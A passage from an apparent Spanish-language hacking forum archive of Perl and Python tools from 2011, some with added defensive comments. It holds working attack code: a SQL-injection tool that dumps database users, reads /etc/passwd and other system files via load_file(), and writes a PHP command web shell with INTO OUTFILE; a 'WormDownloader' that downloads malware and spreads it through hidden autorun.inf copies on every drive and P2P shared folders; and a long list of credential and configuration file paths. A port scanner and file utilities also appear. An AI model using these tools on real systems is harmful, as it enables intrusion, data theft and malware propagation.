    # pass1/pass2 are computed from bypass() but not used in this function.
    #
    # Defender's view: MySQL's LOAD_FILE() returns NULL unless the connecting
    # account holds the FILE privilege and the path is allowed by
    # secure_file_priv, so an application account without FILE yields no hits.
    # In request logs this appears as a burst of requests, one per path in the
    # list, whose query strings contain "load_file(0x".
    def fuzz(web,bypassx):
    print "\n[+] Fuzzing files with load_file()\n"
    pass1,pass2 = bypass(bypassx)
    for archivos in files:
      nombre = archivos
      # Path is sent as a 0x... hex literal, so no quote characters are needed.
      file = "0x"+str(binascii.hexlify(archivos))
      web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web)

      code = toma(web1)

      # re.S lets "." span newlines, so multi-line content is captured.
      if (re.findall("k0bra(.*?)k0bra",code,re.S)):
       algo = re.findall("k0bra(.*?)k0bra",code,re.S)
       print "\n[File Found] : ",nombre
       print "\n[Source Start]\n"
       print algo[0]
       print "\n[Source End]"
       # Each hit is appended to logs/<host>.txt, host taken from the URL.
       savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre)
       savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n")
       savefile("logs/"+gethost(web)+".txt",algo[0])
       savefile("logs/"+gethost(web)+".txt","\n[Source End]")
    print "\n[+] Finished\n"

    def fuzzfile(web,bypassx):
    pass1,pass2 = bypass(bypassx)
    archivos = raw_input("\n[File To load] : ")
    nombre = archivos
    file = "0x"+str(binascii.hexlify(archivos))
    web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web)

    code = toma(web1)

    if (re.findall("k0bra(.*?)k0bra",code,re.S)):
      algo = re.findall("k0bra(.*?)k0bra",code,re.S)
      print "\n\n[File Found] : ",nombre
      print "\n[Source Start]\n"
      print algo[0]
      print "\n[Source End]"
      savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre)
      savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n")
      savefile("logs/"+gethost(web)+".txt",algo[0])
      savefile("logs/"+gethost(web)+".txt","\n[Source End]")
    else:
      print "\n\n[-] Error"

    def into(web,passx):
    pass1,pass2 = bypass(passx)
    dira = raw_input("\n\n[Full Source Discloure] : ")
    diro = raw_input("\n[Directory to test] : ")

    linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
    lugar = dira+"/cmd.php"
    lugardos = diro+"/cmd.php"
    webtest = "http://"+gethost(web)+lugardos
    web1 = re.sub("hackman",linea,web)
    formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
    toma(formandoweb)
    code = toma(webtest)
    if (re.findall("Mini Shell By Doddy",code)):
      print "\n\n[shell up] : "+webtest
      savefile("logs/"+gethost(web)+".txt","\n[shell up] : "+webtest)
    else:
      print "\n\n[-] Error"


    def menu(page,bypass):
    clean()
    header()
    print "\n[+] Target : ",page,"\n"
    print "\n[information_schema]\n"
    print "1 - Show tables"
    print "2 - Show columns of the a table"
    print "3 - Show databases"
    print "4 - Show tables from the a DB"
    print "5 - Show columns from the a table of the DB"
    print "\n[mysql.user]\n"
    print "6 - Show users"
    print "\n[Others]\n"
    print "7 - Show details"
    print "8 - Dump data"
    print "9 - Fuzz Files with load_file"
    print "10 - Load files with load_file"
    print "11 - Create Shell"
    print "12 - Show log"
    print "13 - Change target"
    print "14 - Exit\n\n"


    try:

      op = input("[Option] : ")

      if op == 1:
       showtables(page,bypass)
       men()
      elif op == 2:
       table = raw_input("\n\n[Table] : ")
       showcolumns(table,page,bypass)
       men()
      elif op == 3:
       showdbs(page,bypass)
       men()
      elif op == 4:
       db = raw_input("\n\n[DB] : ")
       showtablesdb(page,db,bypass)
       men()
      elif op == 5:
       db = raw_input("\n\n[DB] : ")
       table = raw_input("\n\n[Table] : ")
       showcolumnsdb(page,db,table,bypass)
       men()
      elif op == 6:
       mysqluser(page,bypass)
       men()
      elif op == 7:
       more(page,bypass)
       men()
      elif op == 8:

       table = raw_input("\n\n[Table] : ")
       col1 = raw_input("\n\n[Column 1] : ")
       col2 = raw_input("\n\n[Column 2] : ")
       dumper(page,bypass,table,col1,col2)
       men()
       
      elif op == 9:
       fuzz(page,bypass)
       men()
      elif op == 10:
       fuzzfile(page,bypass)
       men()
      elif op == 11:
       into(page,bypass)
       men()
      elif op == 12:
       os.system("start logs/"+gethost(page)+".txt")
       menu(page,bypass)
      elif op == 13:
       sta()
      elif op == 14:
       sys.exit(1) 
      else:
       menu(page,bypass)
    except:
      menu(page,bypass)

    def more(web,passx):
    pass1,pass2 = bypass(passx)
    otraweb = web
    print "\n[+] Searching more data\n"
    hextest = "0x2f6574632f706173737764"
    web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb)
    code0 = toma(web1+pass2)
    if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
      datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
      datar = re.split("K0BRA",datax[0])
      savefile("logs/"+gethost(web)+".txt","")
      print "[+] Username :",datar[1]
      print "[+] Database :",datar[2]
      print "[+] Version :",datar[3],"\n"
      savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
      savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
      savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
    code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
    if (re.findall("K0BRA",code1)):
       print "[+] mysql.user : on"
       savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
    code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
    if (re.findall("K0BRA",code2)):
       print "[+] information_schema.tables : on"
       savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")
    codetres = toma(web2)
    if (re.findall("ERTOR854",codetres)):
      print "[+] load_file() : on"
      savefile("logs/"+gethost(web)+".txt","[+] load_file() : on")

    def findlength(web,passx):
    pass1,pass2 = bypass(passx)
    print "\n[+] Finding columns length"
    number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
    for te in range(2,30):
      number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
      code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code)):
       numbers = re.findall("K0BRA(.*?)K0BRA",code)
       print "[+] Column length :",te
       print "[+] Numbers",numbers,"print data"
       sql = ""
       tex = te + 1
       for sqlix in range(2,tex):
        sql = str(sql)+","+str(sqlix)
        sqli  = str(1)+sql
       sqla = re.sub(numbers[0],"hackman",sqli)
       savefile("logs/"+gethost(web)+".txt","\n[Target] : "+web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla+"\n")
       menu(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
    print "[-] Length dont found\n"
    reiniciar()
         
    # Boolean-based check: fetch the URL twice with the value "1" followed by
    # "and 1=0" and by "and 1=1" (joined and terminated with the separators
    # returned by bypass()), and treat any difference between the two response
    # bodies as a sign that the appended condition reached the SQL query.
    #
    # Defender's view: in access logs this is a pair of requests to the same
    # parameter whose query strings differ only in "1=0" / "1=1". Because the
    # test is a plain string comparison, pages whose output changes between
    # requests for unrelated reasons also count as a difference. When the
    # parameter is bound in a prepared statement, both requests return the same
    # page.
    def scan(web,passx):
    pass1,pass2 = bypass(passx)
    print "\n\n[+] Testing vulnerability"
    code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2)
    codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2)

    if not code==codedos:
      print "[+] SQLI Detected"
      findlength(web,passx)
    else:
      print "[-] Not Vulnerable"
      # The operator can continue with findlength() anyway; "n" and any other
      # answer both go to reiniciar().
      op = raw_input("\n[+] Scan anyway y/n : ")
      if op == "y":
       findlength(web,passx)
      elif op == "n":
       reiniciar()
      else:
       reiniciar()

    def sta():

    clean()
    header()

    web = raw_input("\n\n[Page] : ")
    bypasx = raw_input("\n\n[Bypass] : ")
    if (re.findall("hackman",web,re.I)):
      menu(web,bypasx)
    else:
      try:
       scan(web,bypasx)
      except:
       print "\n[-] Web offline"
       reiniciar()

    installer()
    sta()

    #The End
#330
Scripting / [Perl] WormDownloader 0.3
3 Diciembre 2011, 16:35 PM
Simple programa que nos sirve para bajar un virus cualquiera de una página para después propagarlo por toda la computadora

Código (perl) [Seleccionar]

#!usr/bin/perl
#WormDownloader 0.3
#Coded By Doddy H

use Win32::File;
use Cwd;
use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

my @rutas = ("C:\\Archivos de programa\\KMD\\My Shared Folder","C:\\Archivos de programa\\Kazaa\\My Shared Folder\\","C:\\Archivos de programa\\KaZaA Lite\\My Shared Folder\\","C:\\Archivos de programa\\Morpheus\\My Shared Folder\\","C:\Archivos de programa\\Grokster\\My Grokster\\","C:\\Archivos de programa\\BearShare\\Shared\\","C:\\Archivos de programa\\Edonkey2000\\Incoming\\","C:\\Archivos de programa\\limewire\\Shared\\","C:\\Documents and Settings\\Administrador\\Configuración local\\Datos de programa\\Ares\\My Shared Folder\\");

head();
print "\n\n[+] File to download : ";
chomp(my $down = <stdin>);
print "\n[+] Name to save : ";
chomp(my $name= <stdin>);
print "\n[+] Downloading...\n";
if (download($down,$name)) {
hideit($name,"hide");
print "\n[+] Propagation routine starting\n";
wormear($down,$name);
} else {
print "\n[-] Error downloading\n";
}
print "\n\n[+] Finished\n\n";
copyright();
<stdin>;

# Copy the already-downloaded file $name to the root of every drive letter,
# together with an autorun.inf that references it, and into each existing
# directory listed in the file-level @rutas (P2P client shared folders).
#
# Defender's view: the observable artefacts are an autorun.inf plus an
# identically named file, both with the hidden attribute set, at the root of
# each mounted volume, and the same file name appearing in P2P shared folders.
# Current Windows releases do not honour AutoRun entries on non-optical media
# by default, and the NoDriveTypeAutoRun policy disables it per drive type.
sub wormear {

# $filedown is received from the caller but not used in this sub.
my($filedown,$name) = @_;

my $exe = getcwd()."/".$name;

# Append mode on a bareword handle; the result of open is not checked.
open (AUTORUN,">>autorun.inf");
print AUTORUN "[AutoRun]\n";
print AUTORUN "open = $exe\n";
print AUTORUN "shellexecute=$exe\n";
print AUTORUN "shell\\Auto\\command=$exe\n";
close AUTORUN;

# 65..90 are the character codes of 'A'..'Z', i.e. every drive letter.
# The third argument of Win32::CopyFile is the overwrite flag; 0 leaves an
# existing destination file in place. Return values are ignored, so drives
# that do not exist are silently skipped.
for my $dir(65..90) {
Win32::CopyFile($name,chr($dir).":/".$name,0);
Win32::CopyFile("autorun.inf",chr($dir).":/autorun.inf",0);
hideit(chr($dir).":/".$name,"hide");
hideit(chr($dir).":/autorun.inf","hide");
}
# The working copy of autorun.inf in the current directory is removed.
unlink("autorun.inf");

# Only directories from @rutas that exist on this machine receive a copy.
for my $r(@rutas) {
chomp $r;
if (-d $r) {
Win32::CopyFile($name,$r."/".$name,0);
}}}

sub hideit {
if ($_[1] eq "show") {
Win32::File::SetAttributes($_[0],NORMAL);
}
elsif ($_[1] eq "hide") {
Win32::File::SetAttributes($_[0],HIDDEN);
}
else {
#print "error\n";
}
}

sub download {
if ($nave->mirror($_[0],$_[1])) {
if (-f $_[1]) {
return true;
}}}

sub head {
print "\n\n-- == WormDownloader == --\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

#The End ?
#331
Scripting / [Perl] USB Manager 0.2
3 Diciembre 2011, 16:34 PM
Simple manager para usb

Código (perl) [Seleccionar]

#!usr/bin/perl
#USB Manager 0.2
#Coded By Doddy H

use Cwd;

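head();

# Ask for the drive or directory to work in and move there.
print "\n\n[+] USB : ";
my $usb = <STDIN>;
$usb = '' unless defined $usb;
chomp $usb;
if ( !chdir($usb) ) {
    print "\n[-] Error\n";
}
print "\n";

# Interactive prompt. Each command must be the whole input line, so a file
# name that merely contains a command word (for example "del list.txt") no
# longer triggers a second command.
PROMPT: while (1) {
    print "\n" . getcwd() . ">";
    my $rta = <STDIN>;

    # End of input: leave the loop instead of redrawing the prompt forever.
    last PROMPT unless defined $rta;

    chomp $rta;
    $rta =~ s/\A\s+|\s+\z//g;
    print "\n\n";

    if ( $rta =~ /\Alist\z/ ) {
        for my $entry ( coleccionar( getcwd() ) ) {
            my $kind = -f $entry ? "File" : "Directory";
            print "[$kind] : $entry\n";
        }
    }
    elsif ( $rta =~ /\A(show|hide) (.+)\z/ ) {
        my ( $mode, $target ) = ( $1, $2 );
        if ( -f $target or -d $target ) {
            hideit( $target, $mode );
            print "\n\n[+] Attributes changed\n\n";
        }
    }
    elsif ( $rta =~ /\Acd (.+)\z/ ) {
        my $dir = $1;
        if ( chdir($dir) ) {
            print "\n[+] Directory changed\n";
        }
        else {
            print "\n[-] Error\n";
        }
    }
    elsif ( $rta =~ /\Adel (.+)\z/ ) {
        my $file = getcwd() . "/" . $1;

        # Plain files are unlinked; anything else is treated as a directory,
        # which rmdir only removes when it is empty.
        if ( -f $file ) {
            if ( unlink($file) ) {
                print "\n[+] File Deleted\n";
            }
            else {
                print "\n[-] Error\n";
            }
        }
        elsif ( rmdir($file) ) {
            print "\n[+] Directory Deleted\n";
        }
        else {
            print "\n[-] Error\n";
        }
    }
    elsif ( $rta =~ /\Arename (.+) (.+)\z/ ) {

        # Greedy first group: the new name is the text after the last space.
        my ( $from, $to ) = ( $1, $2 );
        if ( rename( getcwd() . "/" . $from, getcwd() . "/" . $to ) ) {
            print "\n[+] File Changed\n";
        }
        else {
            print "\n[-] Error\n";
        }
    }
    elsif ( $rta =~ /\Aopen (.+)\z/ ) {
        my $file = $1;

        # NOTE(review): single-argument system() hands the typed text to the
        # command interpreter whenever it contains shell metacharacters, so
        # this runs whatever the operator types, not only a file in the
        # current directory.
        system($file);
    }
    elsif ( $rta =~ /\Ahelp\z/ ) {
        print "\nCommands : help cd list del rename open hide show exit\n\n";
    }
    elsif ( $rta =~ /\Aexit\z/ ) {
        copyright();
        exit(1);
    }

    print "\n\n";
}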

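# Return the name of every entry in the directory given as the first argument
# (including "." and ".."). When the directory cannot be opened the list is
# empty.
sub coleccionar {
    my ($dir) = @_;
    my @archivos;

    # Lexical handle instead of the package-wide DIR bareword.
    if ( opendir( my $dh, $dir ) ) {
        @archivos = readdir $dh;

        # Directory handles are released with closedir; close() does not
        # apply to them.
        closedir $dh;
    }
    return @archivos;
}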

# Change the Win32 file attributes of the path in the first argument. The
# second argument selects the attribute: "show" applies NORMAL and "hide"
# applies HIDDEN; any other value prints an error line and changes nothing.
sub hideit {
    use Win32::File;
    my ( $path, $mode ) = @_;

    unless ( $mode eq "show" or $mode eq "hide" ) {
        return print "\n[-] error\n";
    }

    my $attribute = $mode eq "show" ? NORMAL : HIDDEN;
    return Win32::File::SetAttributes( $path, $attribute );
}

sub head {
print "\n\n-- == USB Manager == --\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
}

# The End ?
#332
Scripting / [Perl] SecurityManager 0.3
3 Diciembre 2011, 16:34 PM
Un simple programa para ver las últimas 5 vulnerabilidades reportadas en SecurityFocus

Código (perl) [Seleccionar]

#!usr/bin/perl
#SecurityFocus Manager 0.3
#(C) Doddy Hackman 2011
##ppm install http://www.bribes.org/perl/ppm/HTML-Strip.ppd

use LWP::UserAgent;
use HTML::Parser;
use HTML::Strip;

# Shared HTTP client used by toma(): browser-like User-Agent, 5 second timeout.
my $nave = LWP::UserAgent->new(
    agent   => "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12",
    timeout => 5,
);

# Show the banner, then enter the interactive menu.
head();
refrescar();

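sub refrescar {
    # Redraw the screen, list the advisories currently linked from the
    # SecurityFocus front page and serve one round of the interactive menu.
    # Options 2-6 pass the chosen advisory to dar(), which comes back here.

    clean();
    head();

    print "\n\n[+] List of vulnerabilities\n\n\n";

    # getlinks() ignores its arguments; the original passed an unset $code.
    my %links = getlinks();

    # Freeze one ordering of the titles so the number printed next to an
    # entry is exactly the index used to look it up again below.
    my @titulos = keys %links;
    for my $indice (0 .. $#titulos) {
        print "[$indice] : $titulos[$indice]\n";
    }
    print qq(

[1] : Refresh
[2] : Info
[3] : Discussion
[4] : Exploit
[5] : Solution
[6] : References
[7] : Exit

);

    print "\n[Option] : ";
    my $op = <stdin>;

    # End of input: leave instead of recursing forever through the fallback.
    unless (defined $op) {
        copyright();
        exit(1);
    }
    chomp $op;

    # Menu option => section keyword understood by dar().
    my %seccion_de = (
        2 => "tres",
        3 => "cuatro",
        4 => "cinco",
        5 => "seis",
        6 => "siete",
    );

    if ($op eq "7") {
        copyright();
        exit(1);
    }
    elsif (exists $seccion_de{$op}) {
        print "\n[+] Number : ";
        my $se = <stdin>;
        $se = "" unless defined $se;
        chomp $se;

        # Accept only an index that was actually listed. The original used
        # whatever was typed as an array subscript, so a bad value sent an
        # empty identifier to dar() and from there into the request URL.
        if ($se =~ /\A\d+\z/ and $se < @titulos) {
            my $titulo = $titulos[$se];
            dar($titulo, $links{$titulo}, $seccion_de{$op});
        }
        else {
            print "\n[-] Invalid number\n";
            refrescar();
        }
    }
    else {
        # Option 1 and any unrecognised input simply redraw the list.
        refrescar();
    }
}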

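sub dar {
    # Fetch one section of a SecurityFocus advisory and print it as text.
    #   $title  - advisory title as scraped from the front page
    #   $numero - advisory (BID) identifier
    #   $op     - section keyword: tres, cuatro, cinco, seis or siete
    # Always hands control back to the menu through refrescar().

    my ($title, $numero, $op) = @_;

    print "\n\n[+] Getting data\n\n";

    # Section keyword => last path component of the advisory URL.
    my %ruta_de = (
        tres   => "info",
        cuatro => "discuss",
        cinco  => "exploit",
        seis   => "solution",
        siete  => "references",
    );

    # The URL lives in a lexical. The original stored it in a package global,
    # so an unknown keyword silently re-fetched the previous advisory.
    if (exists $ruta_de{$op}) {
        # NOTE(review): plain http:// - the response can be modified in
        # transit, so everything below treats it as untrusted text.
        my $link = "http://www.securityfocus.com/bid/$numero/$ruta_de{$op}";
        my $code = toma($link);

        if ($code =~ /<div id="vulnerability">(.*?)<\/div>/s) {
            my $bloque = $1;
            chomp $bloque;
            my $uno = HTML::Strip->new(emit_spaces => 1);
            my $final = $uno->parse($bloque);
            $final =~ s/^[\t\f ]+|[\t\f ]+$//mg;

            # The title was scraped from a remote page: \Q...\E matches it
            # literally instead of compiling it as a regular expression.
            # An empty pattern would reuse the last successful regex, so
            # the substitution is skipped when there is no title.
            if (defined $title and length $title) {
                $final =~ s/\Q$title\E/ /;
            }

            # Drop control characters (tab, LF and CR are kept) so remote
            # content cannot send escape sequences to the terminal.
            $final =~ tr/\x00-\x08\x0B\x0C\x0E-\x1F\x7F//d;
            print $final;
        }
    }

    print "\n\n[+] Press any key to continue\n\n";
    <stdin>;
    refrescar();
}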

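sub getlinks {
    # Scrape the SecurityFocus front page and return a hash that maps each
    # advisory title to its numeric identifier, taken from links of the
    # form /bid/<digits>. Arguments are ignored.

    my $code = toma("http://www.securityfocus.com/");

    # Parser state is held in lexicals captured by the two handlers below.
    # The original used package globals and nested named subs (start/text),
    # so titles collected by earlier refreshes were never discarded.
    my %links;
    my $visto_a = 0;     # becomes true at the first <a> and stays true
    my $href    = "";    # href of the most recent <a>, cleared after use

    my $al_abrir = sub {
        my ($etiqueta, $atributos) = @_;
        return unless $etiqueta eq "a";
        $href = defined $atributos->{href} ? $atributos->{href} : "";
        $visto_a = 1;
    };

    my $al_texto = sub {
        my $title = shift;
        chomp $title;
        return unless $visto_a;

        # Only digits are accepted as identifier: the value is later placed
        # into a request URL, and it comes from a page fetched over HTTP.
        if ($href =~ m{/bid/(\d+)}) {
            my $id = $1;
            unless ($title =~ /www\.securityfocus\.com/) {
                $links{$title} = $id;
            }
        }
        $href = "";
    };

    my $test = HTML::Parser->new(
        start_h => [$al_abrir, "tagname,attr"],
        text_h  => [$al_texto, "dtext"],
    );
    $test->parse($code);
    # Signal end of document so text still buffered by the parser is delivered.
    $test->eof;

    return %links;
}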

sub toma {
    # GET the URL passed as first argument with the shared $nave client and
    # return the response body; no status check is made.
    my $respuesta = $nave->get($_[0]);
    return $respuesta->content;
}

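sub repes {
    # Return the arguments with duplicates removed, keeping first-seen order.
    # The bookkeeping is lexical: the original accumulated into the package
    # globals @limpio and %repe, so each call also returned the values of
    # every earlier call.
    my %visto;
    my @limpio = grep { !$visto{$_}++ } @_;
    return @limpio;
}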

sub clean {
    # Clear the console with the Windows "cls" command. The author left a
    # "clear" fallback for other systems disabled, so only cls is run.
    my $comando = "cls";
    system($comando);
}

sub head {
    # Print the SecurityFocus Manager banner.
    my $banner = "\n\n-- == SecurityFocus Manager 0.3 == --\n\n";
    print $banner;
}

sub copyright {
    # Print the author credit shown when the program exits.
    my $credito = "\n\n\n(C) Doddy Hackman 2011\n\n";
    print $credito;
}

#Credits: Thanks to explorer (perlenespanol)
# The End ?

#333
Scripting / [Perl] ScanPort 0.5
3 Diciembre 2011, 16:33 PM
Un escáner de puertos simple en Perl


#!usr/bin/perl
#ScanPort 0.5
#Examples
#perl scan.pl -target localhost -option fast
#perl scan.pl -target localhost -option full -parameters 1-100

use IO::Socket;
use Getopt::Long;

# Command-line options land in the package globals $target, $opcion and
# $parameters.
GetOptions(
    "-target=s"     => \$target,
    "-option=s"     => \$opcion,
    "-parameters=s" => \$parameters,
);

head();

if (!$target) {
    # No target given: show the usage line only.
    sintax();
}
else {
    # "fast" probes the built-in list of well-known ports.
    scanuno($target) if $opcion eq "fast";

    # "full" needs -parameters in the form first-last; the two halves are
    # passed on as typed, without any numeric check.
    if ($opcion eq "full" and $parameters and $parameters =~ /(.*)-(.*)/) {
        my ($start, $end) = ($1, $2);
        scandos($target, $start, $end);
    }
}

copyright();

sub scanuno {
    # Attempt a TCP connection to a fixed set of well-known ports on the
    # host given as first argument and print each port that accepts it,
    # together with the service name from the table below.

    my %ports = (
        "21"   => "ftp",
        "22"   => "ssh",
        "25"   => "smtp",
        "80"   => "http",
        "110"  => "pop3",
        "3306" => "mysql",
    );

    print "\n[+] Scanning $_[0]\n\n\n";

    for my $port (keys %ports) {
        # A full connect with a 0.5 s timeout; a false value means the
        # connection was refused or timed out.
        my $conexion = IO::Socket::INET->new(
            PeerAddr => $_[0],
            PeerPort => $port,
            Proto    => "tcp",
            Timeout  => 0.5,
        );
        next unless $conexion;
        print "[Port] : $port [Service] : $ports{$port}\n";
    }
    print "\n\n[+] Scan Finish\n";
}


sub scandos {
    # Attempt a TCP connection to every port from $_[1] to $_[2] on host
    # $_[0] and print the ones that accept it.

    print "\n[+] Scanning $_[0]\n\n\n";

    for my $port ($_[1] .. $_[2]) {
        # A full connect with a 0.5 s timeout per port.
        my $conexion = IO::Socket::INET->new(
            PeerAddr => $_[0],
            PeerPort => $port,
            Proto    => "tcp",
            Timeout  => 0.5,
        );
        next unless $conexion;
        print "[Port] : $port\n";
    }
    print "\n\n[+] Scan Finish\n";
}

sub head {
    # Print the ScanPort banner.
    my $banner = "-- == ScanPort 0.5 == --\n\n";
    print $banner;
}

sub copyright {
    # Print the author credit shown when the program ends.
    my $credito = "\n\n(C) Doddy Hackman 2011\n\n";
    print $credito;
}

sub sintax {
    # Print the command-line usage, naming the script as it was invoked.
    my $uso = "\n[+] sintax : $0 -target target -option fast/full -parameters 1-9999\n";
    print $uso;
}


# The End ?
#334
Scripting / [Perl] Project Stalker 0.5
3 Diciembre 2011, 16:33 PM
Lo mismo que la versión anterior; solo se mejoró el cliente para vulnerabilidades SQLi


#!usr/bin/perl
#Project STALKER 0.5
#Coded By Doddy H
#
#ppm install http://www.bribes.org/perl/ppm/DBI.ppd
#ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
#

use IO::Socket;
use HTML::LinkExtor;
use LWP::UserAgent;
use Win32::OLE qw(in);
use Win32::Process;
use Net::FTP;
use Cwd;
use URI::Split qw(uri_split);
use MIME::Base64;
use DBI;
use Color::Output;
Color::Output::Init


my @files =('C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','
/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/us
